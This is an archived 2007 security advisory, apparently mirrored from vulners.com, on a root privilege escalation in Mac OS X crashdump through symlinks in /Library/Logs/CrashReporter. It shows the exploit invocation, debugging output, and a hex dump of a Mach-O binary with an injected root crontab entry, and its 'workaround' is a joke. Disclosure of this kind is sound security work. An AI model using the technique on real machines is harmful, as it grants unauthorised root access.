Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15893
HistoryJan 29, 2007 - 12:00 a.m.

MOAB-28-01-2007: Apple crashdump Privilege Escalation Vulnerability

2007-01-2900:00:00
vulners.com
11
JSON

Summary

The vendor (Apple) provides the following description of the software in it's man page:

crashreporterd is the daemon responsible for detecting application crashes. crashreporterd listens for mach exceptions and when it detects a mach exception launches crashdump to investigate the crash and report it to the user.

crashdump is a helper tool used by the crashreporterd daemon to create crash reports and notify the user of application crashes. Users should not run crashdump manually.

crashdump will try to write reports at the user home directory first (/Users/[user]/Library/Logs/CrashReporter/), and if it's not available (ex. permissions don't allow it), it will try the system-wide log directory instead (ex. /Library/Logs/CrashReporter/).

The problem is that it will follow symlinks, and users in the admin group have write access to the directory. As crashreporterd runs under root privileges, any file can be modified by planting a symlink in the /Library/Logs/CrashReporter/ directory, named like the application that will cause the crash dump. We can influence the output by tampering with the Mach-O format. The provided proof of concept demonstrates this by using crafted library names within the binary that triggers the issue.

Exploitation of this issue allows admin-group users (contrary to MOAB-22-01-2007 which allows any user) to gain root privileges without interaction of any type.
Affected versions

Verified on Mac OS X 10.4.8 (8L2127).
Proof of concept, exploit or instructions to reproduce

The exploit will use a Mach-o binary with a crontab string injected in it's __LINKEDIT segment, for triggering the issue and demonstrating how we can execute arbitrary code under root privileges via crashdump.

$ ruby MOAB-28-01-2007.rb

See the 'Exploitation conditions' and 'Debugging information' sections below for further details.
Debugging information

The following output shows the privileges of the involved processes, the modes set on the relevant files and finally the crontab contents injected in the Mach-O binary:

$ ls -l /Library/Logs/
total 48
drwxrwxr-x 3 root admin 102 Jan 17 15:57 AppleFileService
drwxrwxr-x 3 root admin 102 Jan 14 20:26 Console
drwxrwxr-x 7 root admin 238 Jan 19 08:00 CrashReporter

$ strings /usr/libexec/crashreporterd | grep dump
failed to fork panicdump
panicdump
/usr/libexec/crashdump
crashdump[%d] exited with status %d
crashdump[%d] exited due to signal %d
/var/db/crashdump/%s.lock
crashdump
error writing to crashdump
error reading from crashdump. errno: %d
eof from crashdump
unexpected status from crashdump: %d

$ ps aux | grep reporterd | grep root
root 104 0.0 0.0 27764 232 ?? Ss 5:40PM 0:00.00 /usr/libexec/crashreporterd

$ file vuln
vuln: Mach-O executable i386
$ otool -L vuln
vuln:

          • /Users/Shared/r00t
            (compatibility version 1.0.0, current version 88.3.4)

Notes
Exploitation conditions

The data we are modifying within the Mach-O binary is the __LINKEDIT segment, described in the Mac OS X ABI Mach-O File Format Reference as follows:

The __LINKEDIT segment contains raw data used by the dynamic linker, such as symbol, string, and relocation table entries.

In the sample binary file (starting at offset 0x320):

38 00 00 00 5F 5F 4C 49 4E 4B 45 44 49 54 00 00 \
00 00 00 00 00 40 00 00 00 10 00 00 00 30 00 00 |
20 04 00 00 03 00 00 00 01 00 00 00 00 00 00 00 |—> __LINKEDIT
04 00 00 00 0E 00 00 00 1C 00 00 00 0C 00 00 00 |
2F 75 73 72 2F 6C 69 62 2F 64 79 6C 64 00 00 00 /
0C 00 00 00 34 00 00 00 18 00 00 00 68 B7 9B 45
04 03 58 00 00 00 01 00 0A 0A 2A 20 2A 20 2A 20 \
2A 20 2A 20 2F 55 73 65 72 73 2F 53 68 61 72 65 |—> injected crontab
64 2F 72 30 30 74 0A 00 18 00 00 00 00 30 00 00 /

Read the provided exploit source code for further details. Exploitation of the issue is straightforward.
Workaround or temporary solution

Wipe off Mac OS X and install MS-DOS. You can even play Winnie the Pooh in the Hundred Acre Wood with ultra modern graphics. OS X, instead, just has crappy chess and tic-tic-toe games. Seriously.

"Gimme back my Heffalump Army!" - Darth Pletora, during the Winnie the Pooh Doomsday.
JSON